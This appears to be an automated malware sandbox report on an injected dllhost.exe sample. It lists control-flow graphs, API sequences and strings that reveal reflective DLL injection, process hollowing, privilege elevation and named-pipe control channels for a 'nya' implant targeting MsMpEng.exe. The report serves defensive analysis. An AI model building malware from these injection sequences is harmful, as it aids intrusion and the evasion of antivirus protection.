14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 140001868 31 API calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 140002712 ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                          • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                          • API String ID: 3658652915-3222643892
                                                          • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                          • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                                          • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                          • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 66 140001a33-140001a4b OpenProcessToken 62->66 63->59 65 1400019c1-1400019db 63->65 64->63 67 1400019a0-1400019b0 StrCpyW 64->67 68 1400019e0-1400019f2 StrCmpIW 65->68 66->61 69 140001a51-140001a77 GetTokenInformation 66->69 67->63 68->61 70 1400019f8-140001a02 68->70 71 140001af4 69->71 72 140001a79-140001a82 GetLastError 69->72 70->59 70->68 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 78 140001ae2 75->78 79 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->79 76->61 77 140001b1c-140001b27 76->77 77->61 80 140001b2d-140001b37 77->80 81 140001ae9-140001af2 LocalFree 78->81 79->81 82 140001b52 80->82 83 140001b39-140001b43 80->83 81->74 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->61 102->61 103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                          • API String ID: 2456419452-2628171563
                                                          • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                          • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                          • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                          • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 1400031d0-1400031f1 114 140003413-140003419 113->114 115 1400031f7 113->115 116 140003619 call 140001f7c 114->116 117 14000341f-140003425 114->117 118 140003355-140003379 ReadFile 115->118 119 1400031fd-140003203 115->119 122 14000361e-140003630 116->122 120 1400035c9-1400035dc call 1400020fc 117->120 121 14000342b-14000342e 117->121 118->122 123 14000337f-140003386 118->123 125 140003209-14000320c 119->125 126 14000334c-14000334e ExitProcess 119->126 120->122 143 1400035de-1400035ed call 1400020fc 120->143 128 140003434-14000343a 121->128 129 140003515-140003526 call 1400020fc 121->129 123->122 130 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 123->130 131 140003212-140003215 125->131 132 14000333d-140003347 125->132 136 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 128->136 137 140003440-140003446 128->137 129->122 155 14000352c-14000354e ReadFile 129->155 145 1400033c5-1400033c7 130->145 133 14000321b-140003221 131->133 134 140003330-140003338 131->134 132->122 140 1400032c2-1400032e6 ReadFile 133->140 141 140003227-14000322a 133->141 134->122 137->122 144 14000344c-140003477 RegOpenKeyExW 137->144 140->122 154 1400032ec-1400032f3 140->154 141->122 147 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 141->147 143->122 165 1400035ef-140003617 ShellExecuteW 143->165 150 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 144->150 151 140003479-1400034af RegDeleteValueW * 3 144->151 152 1400033c9-1400033cf 145->152 153 1400033fa-14000340e GetProcessHeap HeapFree 145->153 147->122 156 14000326e-14000327f 147->156 150->122 151->150 152->153 160 1400033d1-1400033e3 152->160 153->122 154->122 161 1400032f9-14000332b call 140001868 * 2 154->161 155->122 162 140003554-14000355b 155->162 156->122 163 140003285-1400032bb call 140001868 * 2 156->163 167 1400033e5-1400033e7 160->167 168 1400033e9-1400033f1 160->168 161->122 162->122 170 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 162->170 189 1400032bd 163->189 165->122 167->168 173 1400033f5 call 140001eec 167->173 168->160 174 1400033f3 168->174 170->153 176 1400035a5-1400035b1 170->176 173->153 174->153 176->153 181 1400035b7-1400035c4 call 140002434 176->181 181->153 189->122
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                                          • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                                          • API String ID: 2078740077-1712970621
                                                          • Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                          • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                                          • Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                          • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                          • String ID:
                                                          • API String ID: 4084875642-0
                                                          • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                          • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                                          • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                          • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                          • String ID:
                                                          • API String ID: 3197395349-0
                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                          • String ID: .text$C:\Windows\System32\
                                                          • API String ID: 2721474350-832442975
                                                          • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                          • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                          • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                          • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                          • String ID: M$\\.\pipe\$nya-childproc
                                                          • API String ID: 2203880229-802795868
                                                          • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                          • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                                          • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                          • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 140002cb0-140002cba 239 140002cbd-140002cd0 call 140002300 238->239 242 140002cd2-140002cdb Sleep 239->242 243 140002cdd-140002cea ConnectNamedPipe 239->243 242->239 244 140002d21-140002d26 Sleep 243->244 245 140002cec-140002d0d ReadFile 243->245 246 140002d2c-140002d35 DisconnectNamedPipe 244->246 245->246 247 140002d0f-140002d14 245->247 246->243 247->246 248 140002d16-140002d1d call 1400031d0 247->248 249 140002d1f 248->249 249->246
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                          • String ID: \\.\pipe\$nya-control
                                                          • API String ID: 2071455217-2728758917
                                                          • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                          • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                          • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                          • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 259 140003634-140003688 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 260 14000368a-14000369d K32EnumProcesses 259->260 261 1400036e7-1400036f0 Sleep 260->261 262 14000369f-1400036ae 260->262 261->260 263 1400036d8-1400036e3 262->263 264 1400036b0-1400036b4 262->264 263->261 265 1400036b6 264->265 266 1400036c7-1400036ca call 140003190 264->266 267 1400036ba-1400036bf 265->267 268 1400036ce 266->268 269 1400036c1-1400036c5 267->269 270 1400036d2-1400036d6 267->270 268->270 269->266 269->267 270->263 270->264
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                          • String ID:
                                                          • API String ID: 3676546796-0
                                                          • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                          • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                          • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                          • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                          • String ID:
                                                          • API String ID: 1323846700-0
                                                          • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                          • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                                          • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                          • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 283 140002d38-140002d3c call 140002d4c 285 140002d41-140002d43 ExitProcess 283->285
                                                          APIs
                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                          • String ID:
                                                          • API String ID: 2472495637-0
                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 343 140002434-140002469 344 140002911 343->344 345 14000246f-14000247b 343->345 348 140002913-14000292d 344->348 346 140002493 345->346 347 14000247d-140002487 345->347 350 140002496-140002499 346->350 347->344 349 14000248d-140002491 347->349 349->350 351 1400024d4 350->351 352 14000249b-1400024b6 call 1400020cc 350->352 353 1400024d7-140002532 CreateProcessW 351->353 352->344 369 1400024bc-1400024c7 352->369 355 1400028d7-1400028df 353->355 356 140002538-14000254f 353->356 358 1400028e1-1400028ef OpenProcess 355->358 359 1400028fc-140002903 355->359 360 140002555-14000258f call 1400020cc VirtualAllocEx 356->360 361 140002730-140002767 call 1400020cc VirtualAllocEx 356->361 358->359 362 1400028f1-1400028f6 TerminateProcess 358->362 359->344 364 140002905-14000290c 359->364 360->355 373 140002595-1400025b1 WriteProcessMemory 360->373 361->355 374 14000276d-140002789 WriteProcessMemory 361->374 362->359 364->353 369->344 370 1400024cd 369->370 370->351 373->355 375 1400025b7-1400025dc VirtualProtectEx 373->375 374->355 376 14000278f-1400027b3 VirtualProtectEx 374->376 375->355 378 1400025e2-1400025f0 375->378 376->355 377 1400027b9-1400027c7 376->377 379 140002858-140002877 VirtualAlloc 377->379 380 1400027cd 377->380 381 140002682-1400026a1 VirtualAlloc 378->381 382 1400025f6 378->382 379->355 385 140002879-14000288f Wow64GetThreadContext 379->385 383 1400027d0-1400027f2 WriteProcessMemory 380->383 381->355 384 1400026a7-1400026be GetThreadContext 381->384 386 1400025f9-14000261b WriteProcessMemory 382->386 387 1400028d5 383->387 388 1400027f8-140002803 383->388 384->355 389 1400026c4-1400026e9 WriteProcessMemory 384->389 385->355 390 140002891-1400028b4 WriteProcessMemory 385->390 386->387 391 140002621-14000262c 386->391 387->355 392 140002805-140002809 388->392 393 14000280b 388->393 389->355 394 1400026ef-14000270c SetThreadContext 389->394 390->355 395 1400028b6-1400028ca Wow64SetThreadContext 390->395 396 140002634 391->396 397 14000262e-140002632 391->397 398 14000280f-14000283e call 140002930 VirtualProtectEx 392->398 393->398 394->355 399 140002712-140002720 ResumeThread 394->399 395->387 400 140002638-140002665 call 140002930 VirtualProtectEx 396->400 397->400 398->387 407 140002844-140002852 398->407 399->355 403 140002726-14000272b 399->403 400->387 406 14000266b-14000267c 400->406 403->348 406->381 406->386 407->379 407->383
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                          • API String ID: 1036100660-1371749706
